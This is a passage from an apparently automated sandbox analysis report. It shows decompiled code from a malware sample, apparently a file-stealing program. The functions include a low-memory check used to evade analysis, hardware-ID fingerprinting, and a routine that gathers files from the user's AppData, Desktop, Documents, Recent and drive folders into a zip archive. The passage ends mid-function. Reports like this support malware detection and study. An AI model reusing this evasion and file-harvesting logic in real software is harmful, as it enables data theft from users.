                                        • __CxxThrowException@8.LIBCMT ref: 29D897FE
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                          • Part of subcall function 29D898C0: std::exception::exception.LIBCMT ref: 29D898EF
                                          • Part of subcall function 29D898C0: __CxxThrowException@8.LIBCMT ref: 29D89904
                                        • _memmove.LIBCMT ref: 29D89845
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
                                        • String ID: )
                                        • API String ID: 163498487-2427484129
                                        • Opcode ID: 914fac20356287e69cc70d605a75dbfccb9b718f67ae8487c92a1d39cdcf5962
                                        • Instruction ID: 174b8506a009bfe0a1429621e6a178281275a6a32b0810e71503ac1d697b4629
                                        • Opcode Fuzzy Hash: 914fac20356287e69cc70d605a75dbfccb9b718f67ae8487c92a1d39cdcf5962
                                        • Instruction Fuzzy Hash: D641CAB5D00206ABD704CF68C884A9EBBF8FF15360F50422EE95697B82D7319947DBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2133 29d81120-29d8115a call 29db5640 GlobalMemoryStatusEx 2136 29d81179-29d8117b ExitProcess 2133->2136 2137 29d8115c-29d8116d 2133->2137 2138 29d8116f 2137->2138 2139 29d81181-29d8118f call 29dadf46 2137->2139 2138->2136 2140 29d81171-29d81177 2138->2140 2140->2136 2140->2139
                                        C-Code - Quality: 89%
                                        			E29D81120(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				unsigned int _v68;
                                        				signed int _v72;
                                        				char _v76;
                                        				signed int _t11;
                                        				unsigned int _t16;
                                        				intOrPtr _t17;
                                        				signed int _t22;
                                        				intOrPtr _t23;
                                        				intOrPtr _t24;
                                        				intOrPtr _t25;
                                        				signed int _t26;
                                        				signed int _t28;
                                        				unsigned int _t31;
                                        
                                        				_t25 = __esi;
                                        				_t24 = __edi;
                                        				_t17 = __ebx;
                                        				_t28 = (_t26 & 0xfffffff8) - 0x48;
                                        				_t11 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t11 ^ _t28;
                                        				_t14 = E29DB5640( &_v76, 0, 0x40);
                                        				_t29 = _t28 + 0xc;
                                        				_v76 = 0x40;
                                        				GlobalMemoryStatusEx(_t28 + 0xc); // executed
                                        				if(_t14 != 1) {
                                        					L4:
                                        					ExitProcess(0);
                                        				}
                                        				_t16 = _v68;
                                        				_t22 = (_t16 << 0x00000020 | _v72) >> 0x14;
                                        				_t14 = _t16 >> 0x14;
                                        				_t31 = _t16 >> 0x14;
                                        				if(_t31 <= 0 && (_t31 < 0 || _t22 < 0x309)) {
                                        					goto L4;
                                        				}
                                        				return E29DADF46(_t14, _t17, _v12 ^ _t29, _t23, _t24, _t25);
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitGlobalMemoryProcessStatus_memset
                                        • String ID: @
                                        • API String ID: 2847449748-2766056989
                                        • Opcode ID: b7ba302533443262dbe4448c248c576d70904f240e32d87886a71da8159ba686
                                        • Instruction ID: 043eea5d67e5763fc249b783b77fcb2debb23d6f514d3561da014c4b6cb33c4a
                                        • Opcode Fuzzy Hash: b7ba302533443262dbe4448c248c576d70904f240e32d87886a71da8159ba686
                                        • Instruction Fuzzy Hash: C7F0F6B16183046BD304AB64D956B2EB3E8FB54B10F808A1DFA4AC66C1EB34D506A697
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E29D895B0(intOrPtr* __ecx, void* __edi, signed int _a4, char _a8) {
                                        				signed int _t11;
                                        				signed int _t16;
                                        				signed int _t19;
                                        				intOrPtr _t20;
                                        				void* _t25;
                                        				signed int _t26;
                                        				intOrPtr* _t28;
                                        				void* _t29;
                                        
                                        				_t25 = __edi;
                                        				_t21 = __ecx;
                                        				_t19 = _a4;
                                        				_t28 = __ecx;
                                        				if(_t19 > 0xfffffffe) {
                                        					E29DAD440("string too long");
                                        				}
                                        				_t11 =  *(_t28 + 0x14);
                                        				if(_t11 >= _t19) {
                                        					if(_a8 == 0 || _t19 >= 0x10) {
                                        						if(_t19 == 0) {
                                        							 *((intOrPtr*)(_t28 + 0x10)) = _t19;
                                        							if(_t11 >= 0x10) {
                                        								_t28 =  *_t28;
                                        							}
                                        							 *_t28 = 0;
                                        						}
                                        						asm("sbb eax, eax");
                                        						return  ~_t11;
                                        					} else {
                                        						_push(_t25);
                                        						_t26 =  *((intOrPtr*)(_t28 + 0x10));
                                        						if(_t19 < _t26) {
                                        							_t26 = _t19;
                                        						}
                                        						if(_t11 >= 0x10) {
                                        							_t20 =  *_t28;
                                        							if(_t26 != 0) {
                                        								E29DB0010(_t28, _t20, _t26);
                                        								_t29 = _t29 + 0xc;
                                        							}
                                        							_push(_t20);
                                        							_t11 = E29DADF3B();
                                        							_t19 = _a4;
                                        						}
                                        						 *((intOrPtr*)(_t28 + 0x10)) = _t26;
                                        						 *(_t28 + 0x14) = 0xf;
                                        						 *((char*)(_t26 + _t28)) = 0;
                                        						asm("sbb eax, eax");
                                        						return  ~_t11;
                                        					}
                                        				} else {
                                        					_t16 = E29D89750(_t21, _t19,  *((intOrPtr*)(_t28 + 0x10))); // executed
                                        					asm("sbb eax, eax");
                                        					return  ~_t16;
                                        				}
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D895C4
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • _memmove.LIBCMT ref: 29D8960B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: string too long
                                        • API String ID: 1785806476-2556327735
                                        • Opcode ID: 7cee484c384a174fb5fbcf1cf629bd6119b019743f8de5c0d1285df5c3e75eb5
                                        • Instruction ID: cdf81f62462f307874ca7cd0fc48bf1b311f6b9ad47fad07f9cca08c4c4f42ff
                                        • Opcode Fuzzy Hash: 7cee484c384a174fb5fbcf1cf629bd6119b019743f8de5c0d1285df5c3e75eb5
                                        • Instruction Fuzzy Hash: 341126B21142106FE7249E78E8C5A1BB798BF21664F104A2FE5C383D83D721E54BA260
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DABEC0(long __edi, void* __esi) {
                                        				void* _t15;
                                        				void* _t17;
                                        
                                        				if( *((intOrPtr*)(__esi + 4)) != 0 ||  *(__esi + 0xc) != 0 ||  *(__esi + 0x20) != 0 ||  *((intOrPtr*)(__esi + 0x18)) != 0 ||  *((intOrPtr*)(__esi + 0x14)) != 0 ||  *((char*)(__esi + 0x2c)) != 0) {
                                        					return 0x1000000;
                                        				} else {
                                        					if(__edi != 0) {
                                        						_t15 = CreateFileMappingA(0xffffffff, 0, 4, 0, __edi, 0); // executed
                                        						 *(__esi + 0xc) = _t15;
                                        						if(_t15 == 0) {
                                        							L11:
                                        							return 0x300;
                                        						} else {
                                        							_t17 = MapViewOfFile(_t15, 0xf001f, 0, 0, __edi); // executed
                                        							 *(__esi + 0x20) = _t17;
                                        							if(_t17 != 0) {
                                        								 *((char*)(__esi + 0x1c)) = 1;
                                        								 *(__esi + 0x24) = 0;
                                        								 *((intOrPtr*)(__esi + 0x28)) = __edi;
                                        								return 0;
                                        							} else {
                                        								CloseHandle( *(__esi + 0xc));
                                        								 *(__esi + 0xc) = 0;
                                        								goto L11;
                                        							}
                                        						}
                                        					} else {
                                        						return 0x30000;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,000F4240,00000000), ref: 29DABEFD
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,000F4240), ref: 29DABF15
                                        • CloseHandle.KERNEL32(?), ref: 29DABF26
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleMappingView
                                        • String ID:
                                        • API String ID: 1187395538-0
                                        • Opcode ID: 8c415b081b0fe467cfec4fca59e003755aa9e886b63dea651cd04639a80ba032
                                        • Instruction ID: 65da8149ee740e15dcaaa663ec98bbcf400a164ef549dd3a37e6728e250245d0
                                        • Opcode Fuzzy Hash: 8c415b081b0fe467cfec4fca59e003755aa9e886b63dea651cd04639a80ba032
                                        • Instruction Fuzzy Hash: 621152B0940782DFE7358B25C809B0376E4BF44B25F54855EE59685DC1C3BDE186EF14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E29DA3460(intOrPtr __ebx, intOrPtr __edi, intOrPtr* __esi) {
                                        				signed int _v8;
                                        				struct tagHW_PROFILE_INFOA _v132;
                                        				char _v136;
                                        				signed int _t10;
                                        				int _t13;
                                        				intOrPtr* _t17;
                                        				intOrPtr _t19;
                                        				intOrPtr _t23;
                                        				intOrPtr _t25;
                                        				intOrPtr _t26;
                                        				intOrPtr* _t27;
                                        				signed int _t28;
                                        
                                        				_t27 = __esi;
                                        				_t26 = __edi;
                                        				_t19 = __ebx;
                                        				_t10 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t10 ^ _t28;
                                        				_v136 = 0;
                                        				_t13 = GetCurrentHwProfileA( &_v132); // executed
                                        				 *((intOrPtr*)(__esi + 0x14)) = 0xf;
                                        				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                        				 *((char*)(__esi)) = 0;
                                        				if(_t13 == 0) {
                                        					_push(7);
                                        					_push("Unknown");
                                        				} else {
                                        					_t17 =  &(_v132.szHwProfileGuid);
                                        					_t25 = _t17 + 1;
                                        					do {
                                        						_t23 =  *_t17;
                                        						_t17 = _t17 + 1;
                                        					} while (_t23 != 0);
                                        					_push(_t17 - _t25);
                                        					_push( &(_v132.szHwProfileGuid));
                                        				}
                                        				E29D892C0(_t27);
                                        				return E29DADF46(_t27, _t19, _v8 ^ _t28, _t25, _t26, _t27);
                                        			}

                                        APIs
                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 29DA3481
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentProfile
                                        • String ID: Unknown
                                        • API String ID: 2104809126-1654365787
                                        • Opcode ID: 2d65aebc2acf7d45b3d21228034f0cf981f6714e5203ffacb2ebd4ed2e3a519b
                                        • Instruction ID: 14e841e1b552751fe9953b9f854b3b78e3035be0a5fb6ff64e94e5ba781cd66b
                                        • Opcode Fuzzy Hash: 2d65aebc2acf7d45b3d21228034f0cf981f6714e5203ffacb2ebd4ed2e3a519b
                                        • Instruction Fuzzy Hash: 99F02831900209EBDB25CF64D854BAEF7F8AF04700F40855CD4818B640EF78A60EDB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E29DB56BA(signed int _a4, signed int _a8, long _a12) {
                                        				void* _t10;
                                        				long _t11;
                                        				long _t12;
                                        				signed int _t13;
                                        				signed int _t17;
                                        				long _t19;
                                        				long _t24;
                                        
                                        				_t17 = _a4;
                                        				if(_t17 == 0) {
                                        					L3:
                                        					_t24 = _t17 * _a8;
                                        					__eflags = _t24;
                                        					if(_t24 == 0) {
                                        						_t24 = _t24 + 1;
                                        						__eflags = _t24;
                                        					}
                                        					goto L5;
                                        					L6:
                                        					_t10 = RtlAllocateHeap( *0x29dd702c, 8, _t24); // executed
                                        					__eflags = 0;
                                        					if(0 == 0) {
                                        						goto L7;
                                        					}
                                        					L14:
                                        					return _t10;
                                        					goto L15;
                                        					L7:
                                        					__eflags =  *0x29dd7694;
                                        					if( *0x29dd7694 == 0) {
                                        						_t19 = _a12;
                                        						__eflags = _t19;
                                        						if(_t19 != 0) {
                                        							 *_t19 = 0xc;
                                        						}
                                        					} else {
                                        						_t11 = E29DB35CE(_t10, _t24);
                                        						__eflags = _t11;
                                        						if(_t11 != 0) {
                                        							L5:
                                        							_t10 = 0;
                                        							__eflags = _t24 - 0xffffffe0;
                                        							if(_t24 > 0xffffffe0) {
                                        								goto L7;
                                        							} else {
                                        								goto L6;
                                        							}
                                        						} else {
                                        							_t12 = _a12;
                                        							__eflags = _t12;
                                        							if(_t12 != 0) {
                                        								 *_t12 = 0xc;
                                        							}
                                        							_t10 = 0;
                                        						}
                                        					}
                                        					goto L14;
                                        				} else {
                                        					_t13 = 0xffffffe0;
                                        					_t27 = _t13 / _t17 - _a8;
                                        					if(_t13 / _t17 >= _a8) {
                                        						goto L3;
                                        					} else {
                                        						 *((intOrPtr*)(E29DB2030(_t27))) = 0xc;
                                        						return 0;
                                        					}
                                        				}
                                        				L15:
                                        			}

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,29DB1F6A,?,?,00000000,00000000,00000000,?,29DB51FD,00000001,00000214), ref: 29DB56FD
                                          • Part of subcall function 29DB2030: __getptd_noexit.LIBCMT ref: 29DB2030
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap__getptd_noexit
                                        • String ID:
                                        • API String ID: 328603210-0
                                        • Opcode ID: 3c62aa7c8e1ede5efa4855be6e5084fb96bd85e81f19fbf29dbb02610284283e
                                        • Instruction ID: 4879abdc31982f507481fc13dc8a53d8a6b87f6dea76bd641ab406b1d99fbe99
                                        • Opcode Fuzzy Hash: 3c62aa7c8e1ede5efa4855be6e5084fb96bd85e81f19fbf29dbb02610284283e
                                        • Instruction Fuzzy Hash: C701B536302211DBEB189E25DC74F573799EF416A0F10851EE817CE980DB34D912E650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E29D90880(intOrPtr __ecx, signed int __edx, CHAR* _a4, intOrPtr _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v1020;
                                        				char _v1124;
                                        				char _v1388;
                                        				char _v2388;
                                        				void* _v3388;
                                        				void* _v4388;
                                        				char _v5388;
                                        				void* _v6388;
                                        				intOrPtr _v6396;
                                        				signed int _v6400;
                                        				char _v6416;
                                        				intOrPtr _v6424;
                                        				intOrPtr _v6428;
                                        				char _v6444;
                                        				intOrPtr _v6452;
                                        				intOrPtr _v6456;
                                        				char _v6472;
                                        				long _v6476;
                                        				char _v6480;
                                        				signed int _v6484;
                                        				signed int* _v6488;
                                        				signed int _v6492;
                                        				char _v6496;
                                        				intOrPtr _v6500;
                                        				signed int _v6504;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t185;
                                        				signed int _t186;
                                        				char* _t213;
                                        				char* _t220;
                                        				intOrPtr* _t224;
                                        				void* _t228;
                                        				intOrPtr* _t230;
                                        				char* _t235;
                                        				char* _t242;
                                        				char* _t248;
                                        				char* _t257;
                                        				char* _t264;
                                        				signed int _t269;
                                        				signed int _t276;
                                        				int _t287;
                                        				char* _t291;
                                        				int _t296;
                                        				CHAR* _t299;
                                        				void* _t304;
                                        				void* _t317;
                                        				void* _t320;
                                        				CHAR* _t321;
                                        				signed int _t325;
                                        				intOrPtr* _t326;
                                        				signed int _t331;
                                        				signed int _t335;
                                        				signed int _t339;
                                        				signed int _t343;
                                        				void* _t346;
                                        				signed int _t347;
                                        				signed int _t349;
                                        				char* _t357;
                                        				intOrPtr _t361;
                                        				char* _t366;
                                        				char* _t372;
                                        				signed int _t376;
                                        				void* _t402;
                                        				void* _t425;
                                        				signed int _t428;
                                        				char* _t429;
                                        				char* _t430;
                                        				char* _t433;
                                        				char* _t434;
                                        				char* _t435;
                                        				signed int _t436;
                                        				char* _t437;
                                        				signed int _t440;
                                        				signed int* _t441;
                                        				void* _t442;
                                        				void* _t447;
                                        				char* _t450;
                                        				signed int _t451;
                                        				signed int _t452;
                                        				void* _t454;
                                        				CHAR* _t455;
                                        				void* _t457;
                                        				CHAR* _t458;
                                        				signed int _t461;
                                        				signed int _t462;
                                        				void* _t463;
                                        				signed int _t464;
                                        				signed int _t465;
                                        				CHAR* _t466;
                                        				CHAR* _t468;
                                        				void* _t470;
                                        				void* _t472;
                                        				CHAR* _t473;
                                        				void* _t475;
                                        				CHAR* _t476;
                                        				void* _t478;
                                        				CHAR* _t479;
                                        				void* _t481;
                                        				CHAR* _t482;
                                        				signed int _t483;
                                        				void* _t484;
                                        				void* _t490;
                                        				void* _t491;
                                        				void* _t493;
                                        				void* _t494;
                                        				void* _t495;
                                        				void* _t496;
                                        				void* _t497;
                                        				void* _t499;
                                        
                                        				E29DBCDB0(0x195c);
                                        				_t185 =  *0x29dd5664; // 0xd9555f04
                                        				_t186 = _t185 ^ _t483;
                                        				_v20 = _t186;
                                        				 *[fs:0x0] =  &_v16;
                                        				_v6492 = _a16;
                                        				_v6504 = _a12;
                                        				_v6500 = __ecx;
                                        				_v6484 = __edx;
                                        				E29DB5640( &_v5388, 0, 0x3e8);
                                        				E29DB5640( &_v1020, 0, 0x3e8);
                                        				E29DB5640( &_v2388, 0, 0x3e8);
                                        				lstrcatA( &_v5388, "\\Files\\");
                                        				lstrcatA( &_v5388, _a4);
                                        				lstrcatA( &_v5388, ".zip");
                                        				_v6488 = E29DAD220(0xf4240, _t499);
                                        				_v6480 = 0;
                                        				_v6496 = 0;
                                        				E29DB5640( &_v3388, 0, 0x3e8);
                                        				 *0x29dd85cc( &_v1020, E29DA4650(_a12, "%APPDATA%",  &_v3388 & (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v3388, _t186, _t425, _t447, _t317,  *[fs:0x0], E29DC4171, 0xffffffff) < 0x00000000) - 0x00000001));
                                        				E29DB5640( &_v4388, 0, 0x3e8);
                                        				_t490 = _t484 + 0x44;
                                        				_t31 = (0 |  *0x29dd8500(0, 0x1c, 0, 0,  &_v4388) < 0x00000000) - 1; // -1
                                        				_t428 = _t31 &  &_v4388;
                                        				_t450 = StrStrA( &_v1020, "%LOCALAPPDATA%");
                                        				if(_t450 != 0) {
                                        					_t357 =  &_v1020;
                                        					_t320 = _t450 - _t357;
                                        					 *0x29dd8498(0x29dd8830, _t357, _t320);
                                        					_t451 = _t450 + 0xe;
                                        					__eflags = _t451;
                                        					_t34 = _t320 + 0x29dd8830; // 0x0
                                        					_t321 = _t34;
                                        					 *_t321 = 0;
                                        					wsprintfA(_t321, "%s%s", _t428, _t451);
                                        					_t490 = _t490 + 0x10;
                                        					_t213 = 0x29dd8830;
                                        				} else {
                                        					_t213 =  &_v1020;
                                        				}
                                        				 *0x29dd85cc( &_v1020, _t213);
                                        				E29DB5640( &_v3388, 0, 0x3e8);
                                        				_t491 = _t490 + 0xc;
                                        				_t325 = (0 |  *0x29dd8500(0, 0x28, 0, 0,  &_v3388) < 0x00000000) - 0x00000001 &  &_v3388;
                                        				_t429 = StrStrA( &_v1020, "%USERPROFILE%");
                                        				_t452 = 0;
                                        				_t220 =  &_v1020;
                                        				if(_t429 != 0) {
                                        					_t481 = _t429 - _t220;
                                        					 *0x29dd8498(0x29dd8830, _t220, _t481);
                                        					_t43 = _t481 + 0x29dd8830; // 0x0
                                        					_t482 = _t43;
                                        					 *_t482 = 0;
                                        					wsprintfA(_t482, "%s%s", _t325, _t429 + 0xd);
                                        					_t491 = _t491 + 0x10;
                                        					_t220 = 0x29dd8830;
                                        					_t452 = 0;
                                        				}
                                        				 *0x29dd85cc( &_v1020, _t220);
                                        				_v6476 = 0x101;
                                        				GetUserNameA( &_v1388,  &_v6476);
                                        				_t224 =  &_v1388;
                                        				_v6396 = 0xf;
                                        				_v6400 = _t452;
                                        				_v6416 = 0;
                                        				_t402 = _t224 + 1;
                                        				do {
                                        					_t361 =  *_t224;
                                        					_t224 = _t224 + 1;
                                        				} while (_t361 != 0);
                                        				E29D892C0( &_v6416,  &_v1388, _t224 - _t402);
                                        				_v8 = _t452;
                                        				_t228 = E29D89930("C:\\Users\\",  &_v6472,  &_v6416);
                                        				_v8 = 1;
                                        				_t230 = E29D95410("\\Desktop\\",  &_v6444, _t228);
                                        				_t493 = _t491 + 8;
                                        				_v8 = 2;
                                        				if( *((intOrPtr*)(_t230 + 0x14)) < 0x10) {
                                        					_t326 = _t230;
                                        				} else {
                                        					_t326 =  *_t230;
                                        				}
                                        				_t430 = StrStrA( &_v1020, "%DESKTOP%");
                                        				if(_t430 != _t452) {
                                        					_t366 =  &_v1020;
                                        					_t454 = _t430 - _t366;
                                        					 *0x29dd8498(0x29dd8830, _t366, _t454);
                                        					_t65 = _t454 + 0x29dd8830; // 0x0
                                        					_t455 = _t65;
                                        					 *_t455 = 0;
                                        					wsprintfA(_t455, "%s%s", _t326, _t430 + 9);
                                        					_t493 = _t493 + 0x10;
                                        					_t235 = 0x29dd8830;
                                        					_t452 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t235 =  &_v1020;
                                        				}
                                        				 *0x29dd85cc( &_v1020, _t235);
                                        				if(_v6424 >= 0x10) {
                                        					_push(_v6444);
                                        					E29DADF3B();
                                        					_t493 = _t493 + 4;
                                        				}
                                        				_v6424 = 0xf;
                                        				_v6428 = _t452;
                                        				_v6444 = 0;
                                        				if(_v6452 >= 0x10) {
                                        					_push(_v6472);
                                        					E29DADF3B();
                                        					_t493 = _t493 + 4;
                                        				}
                                        				_v8 = 0xffffffff;
                                        				_v6452 = 0xf;
                                        				_v6456 = _t452;
                                        				_v6472 = 0;
                                        				if(_v6396 >= 0x10) {
                                        					_push(_v6416);
                                        					E29DADF3B();
                                        					_t493 = _t493 + 4;
                                        				}
                                        				_v6396 = 0xf;
                                        				_v6400 = _t452;
                                        				_v6416 = 0;
                                        				E29DB5640( &_v4388, _t452, 0x3e8);
                                        				_t494 = _t493 + 0xc;
                                        				_t331 = (0 |  *0x29dd8500(_t452, 5, _t452, _t452,  &_v4388) < 0x00000000) - 0x00000001 &  &_v4388;
                                        				_t433 = StrStrA( &_v1020, "%DOCUMENTS%");
                                        				_t242 =  &_v1020;
                                        				if(_t433 != 0) {
                                        					_t478 = _t433 - _t242;
                                        					 *0x29dd8498(0x29dd8830, _t242, _t478);
                                        					_t90 = _t478 + 0x29dd8830; // 0x0
                                        					_t479 = _t90;
                                        					 *_t479 = 0;
                                        					wsprintfA(_t479, "%s%s", _t331, _t433 + 0xb);
                                        					_t494 = _t494 + 0x10;
                                        					_t242 = 0x29dd8830;
                                        				}
                                        				 *0x29dd85cc( &_v1020, _t242);
                                        				E29DB5640( &_v3388, 0, 0x3e8);
                                        				_t495 = _t494 + 0xc;
                                        				_t335 = (0 |  *0x29dd8500(0, 0x26, 0, 0,  &_v3388) < 0x00000000) - 0x00000001 &  &_v3388;
                                        				_t434 = StrStrA( &_v1020, "%PROGRAMFILES%");
                                        				_t248 =  &_v1020;
                                        				if(_t434 != 0) {
                                        					_t475 = _t434 - _t248;
                                        					 *0x29dd8498(0x29dd8830, _t248, _t475);
                                        					_t99 = _t475 + 0x29dd8830; // 0x0
                                        					_t476 = _t99;
                                        					 *_t476 = 0;
                                        					wsprintfA(_t476, "%s%s", _t335, _t434 + 0xe);
                                        					_t495 = _t495 + 0x10;
                                        					_t248 = 0x29dd8830;
                                        				}
                                        				 *0x29dd85cc( &_v1020, _t248);
                                        				E29DB5640( &_v4388, 0, 0x3e8);
                                        				_t496 = _t495 + 0xc;
                                        				_t339 = (0 |  *0x29dd8500(0, 0x2a, 0, 0,  &_v4388) < 0x00000000) - 0x00000001 &  &_v4388;
                                        				_t435 = StrStrA( &_v1020, "%PROGRAMFILES_86%");
                                        				if(_t435 != 0) {
                                        					_t372 =  &_v1020;
                                        					_t457 = _t435 - _t372;
                                        					 *0x29dd8498(0x29dd8830, _t372, _t457);
                                        					_t436 = _t435 + 0x11;
                                        					__eflags = _t436;
                                        					_t109 = _t457 + 0x29dd8830; // 0x0
                                        					_t458 = _t109;
                                        					 *_t458 = 0;
                                        					wsprintfA(_t458, "%s%s", _t339, _t436);
                                        					_t496 = _t496 + 0x10;
                                        					_t257 = 0x29dd8830;
                                        				} else {
                                        					_t257 =  &_v1020;
                                        				}
                                        				 *0x29dd85cc( &_v1020, _t257);
                                        				E29DB5640( &_v6388, 0, 0x3e8);
                                        				_t497 = _t496 + 0xc;
                                        				_t343 = (0 |  *0x29dd8500(0, 8, 0, 0,  &_v6388) < 0x00000000) - 0x00000001 &  &_v6388;
                                        				_t437 = StrStrA( &_v1020, "%RECENT%");
                                        				_t264 =  &_v1020;
                                        				if(_t437 != 0) {
                                        					_t472 = _t437 - _t264;
                                        					 *0x29dd8498(0x29dd8830, _t264, _t472);
                                        					_t118 = _t472 + 0x29dd8830; // 0x0
                                        					_t473 = _t118;
                                        					 *_t473 = 0;
                                        					wsprintfA(_t473, "%s%s", _t343, _t437 + 8);
                                        					_t497 = _t497 + 0x10;
                                        					_t264 = 0x29dd8830;
                                        				}
                                        				 *0x29dd85cc( &_v1020, _t264);
                                        				_push(0);
                                        				_push("*%DRIVE_FIXED%*");
                                        				_push( &_v1020);
                                        				if( *0x29dd8490() != 0) {
                                        					_v6480 = 1;
                                        				}
                                        				_push(0);
                                        				_push("*%DRIVE_REMOVABLE%*");
                                        				_push( &_v1020);
                                        				if( *0x29dd8490() != 0) {
                                        					_v6480 = 1;
                                        					_v6496 = 1;
                                        				}
                                        				_t376 = _v6504;
                                        				_t269 =  *0x29dd8490(_t376, "*%RECENT%*", 0);
                                        				asm("sbb edi, edi");
                                        				_t440 =  ~( ~_t269);
                                        				if(_v6480 == 0) {
                                        					_t376 = _v6492;
                                        					__eflags = 0;
                                        					E29D90820(0, _t376, _a20, _t440, _a24, 0,  &_v1020, _v6488, _a20, _a8, _v6500);
                                        					_t497 = _t497 + 0x14;
                                        					goto L45;
                                        				} else {
                                        					GetLogicalDriveStringsA(0x64,  &_v1124);
                                        					_t466 =  &_v1124;
                                        					_v6476 = _t466;
                                        					if(_v1124 == 0) {
                                        						L45:
                                        						_t441 = _v6488;
                                        						if(_t441 != 0) {
                                        							__eflags =  *_t441 - 2;
                                        							if( *_t441 == 2) {
                                        								_t461 = _t441[1];
                                        								__eflags =  *((char*)(_t461 + 0x2c));
                                        								if( *((char*)(_t461 + 0x2c)) == 0) {
                                        									E29DAD160(_t461, 0x10000, _t376);
                                        								}
                                        								_t414 =  *(_t461 + 0x20);
                                        								asm("sbb eax, eax");
                                        								_t276 = ( ~( *(_t461 + 0x20)) & 0xfffe0000) + 0x20000;
                                        								__eflags = _t276;
                                        								 *((char*)(_t461 + 0x2c)) = 1;
                                        								_t462 =  *((intOrPtr*)(_t461 + 0x18));
                                        								 *0x29dd8814 = _t276;
                                        							} else {
                                        								_t462 = _v6484;
                                        								_t414 = _v6484;
                                        								 *0x29dd8814 = 0x80000;
                                        							}
                                        						} else {
                                        							_t414 = 0;
                                        							_t462 = 0;
                                        							 *0x29dd8814 = 0x10000;
                                        						}
                                        						_t277 = _v6484;
                                        						if(_t277 != 0) {
                                        							__eflags =  *_t277 - 2;
                                        							if( *_t277 == 2) {
                                        								_t376 =  *(_t277 + 4);
                                        								 *0x29dd8814 = E29DAC840(_t376, _t414,  &_v5388, _t462, 3);
                                        							} else {
                                        								 *0x29dd8814 = 0x80000;
                                        							}
                                        						} else {
                                        							 *0x29dd8814 = 0x10000;
                                        						}
                                        						if(_t441 == 0) {
                                        							 *0x29dd8814 = 0x10000;
                                        						} else {
                                        							_t277 =  *_t441;
                                        							if((_t376 & 0xffffff00 | _t277 == 0x00000001) == 0) {
                                        								__eflags = _t277 - 2;
                                        								if(_t277 == 2) {
                                        									_t464 = _t441[1];
                                        									 *0x29dd8814 = E29DAC130(_t464);
                                        									__eflags = _t464;
                                        									if(_t464 != 0) {
                                        										E29DAD2E0(_t464);
                                        									}
                                        									L68:
                                        									_push(_t441);
                                        									_t277 = E29DADF3B();
                                        									L69:
                                        									 *[fs:0x0] = _v16;
                                        									_pop(_t442);
